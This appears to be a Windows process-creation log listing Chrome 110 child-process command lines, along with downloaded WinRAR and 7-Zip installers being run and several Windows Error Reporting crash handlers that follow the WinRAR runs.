"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4752 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4032 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5196 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4964 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5196 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8

C:\Users\Admin\Downloads\winrar-x64-701.exe

"C:\Users\Admin\Downloads\winrar-x64-701.exe"

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\21863f3a269e42f792ed512f378898ac /t 4868 /p 5240

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd0dbab58,0x7ffdd0dbab68,0x7ffdd0dbab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1896 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4336 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4468 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4656 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3156 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3232 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4612 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4960 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4984 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4428 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5172 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8

C:\Users\Admin\Downloads\7z2405-x64.exe

"C:\Users\Admin\Downloads\7z2405-x64.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0x80,0x108,0x7ffdd0dbab58,0x7ffdd0dbab68,0x7ffdd0dbab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1796 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1680 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3104 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3668 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4384 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4552 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4712 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4856 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4548 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4716 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4372 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4664 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2f4 0x3b8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4864 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5508 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2752 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5624 --field-trial-handle=1952,i,6228965915532682483,788372233733337577,131072 /prefetch:8

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe"

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\386efc0b13014c9fa5fa915c94bab0c1 /t 1924 /p 3648

C:\Users\Admin\Downloads\winrar-x64-701.exe

"C:\Users\Admin\Downloads\winrar-x64-701.exe"

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\5e3ef59a3131498abf8e25a896e63c8d /t 2460 /p 3492

C:\Users\Admin\Downloads\winrar-x64-701.exe

"C:\Users\Admin\Downloads\winrar-x64-701.exe"

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\27594d8dceff427db694febdc1835c28 /t 3032 /p 5484

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xbc,0x108,0x7ffdd0dbab58,0x7ffdd0dbab68,0x7ffdd0dbab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1768 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2240 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3096 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4440 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4396 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4760 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4824 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4288 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3168 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3196 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3200 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4600 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5128 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3428 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5504 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Users\Admin\Downloads\winrar-x64-701 (1).exe

"C:\Users\Admin\Downloads\winrar-x64-701 (1).exe"

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\88b1fcd3ac4b4009ad93299c76555df4 /t 5968 /p 1536

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5588 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4324 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1204 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5576 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Users\Admin\Downloads\winrar-x32-701.exe

"C:\Users\Admin\Downloads\winrar-x32-701.exe"

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\d3092f89723b4e8296adabd22a598d1d /t 5112 /p 4276

C:\Program Files\Google\Chrome\Application\chrome.exe

